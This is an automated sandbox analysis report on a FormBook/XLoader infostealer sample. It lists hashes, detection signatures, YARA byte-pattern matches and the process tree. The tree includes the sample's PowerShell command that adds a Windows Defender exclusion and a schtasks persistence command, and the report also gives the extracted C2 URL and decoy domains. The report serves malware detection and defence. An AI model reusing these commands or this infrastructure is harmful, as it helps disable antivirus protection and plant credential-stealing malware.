Play interactive tour

Edit tour

Windows Analysis Report vbc.exe

Overview

General Information

Sample Name:	vbc.exe
Analysis ID:	518412
MD5:	c4a1bdd685e346b7604f93357a922875
SHA1:	6b8fccadcf1977f5850faa1c47617343fafc0ff4
SHA256:	728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
Tags:	exeXloader
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sigma detected: Suspicius Add Task From User AppData Temp

Performs DNS queries to domains with low reputation

.NET source code contains potential unpacker

Sigma detected: Powershell Defender Exclusion

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

vbc.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\vbc.exe" MD5: C4A1BDD685E346B7604F93357A922875)

powershell.exe (PID: 6604 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6624 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vbc.exe (PID: 6824 cmdline: C:\Users\user\Desktop\vbc.exe MD5: C4A1BDD685E346B7604F93357A922875)

explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

help.exe (PID: 6756 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x21c7b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x21cb52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2445d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x244972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x228865:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x250685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x228351:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x250171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x228967:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x250787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x228adf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2508ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x21d56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x24538a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2275cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x24f3ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x21e2e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x246102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x22dd57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x255b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22ee0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x22ac89:$sqlite3step: 68 34 1C 7B E1 0x22ad9c:$sqlite3step: 68 34 1C 7B E1 0x252aa9:$sqlite3step: 68 34 1C 7B E1 0x252bbc:$sqlite3step: 68 34 1C 7B E1 0x22acb8:$sqlite3text: 68 38 2A 90 C5 0x22addd:$sqlite3text: 68 38 2A 90 C5 0x252ad8:$sqlite3text: 68 38 2A 90 C5 0x252bfd:$sqlite3text: 68 38 2A 90 C5 0x22accb:$sqlite3blob: 68 53 D8 7F 8C 0x22adf3:$sqlite3blob: 68 53 D8 7F 8C 0x252aeb:$sqlite3blob: 68 53 D8 7F 8C 0x252c13:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 6420	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.0.vbc.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.0.vbc.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.vbc.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
8.0.vbc.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.0.vbc.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.vbc.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
8.0.vbc.exe.400000.8.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.0.vbc.exe.400000.8.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.vbc.exe.400000.8.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
8.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.2.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
8.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
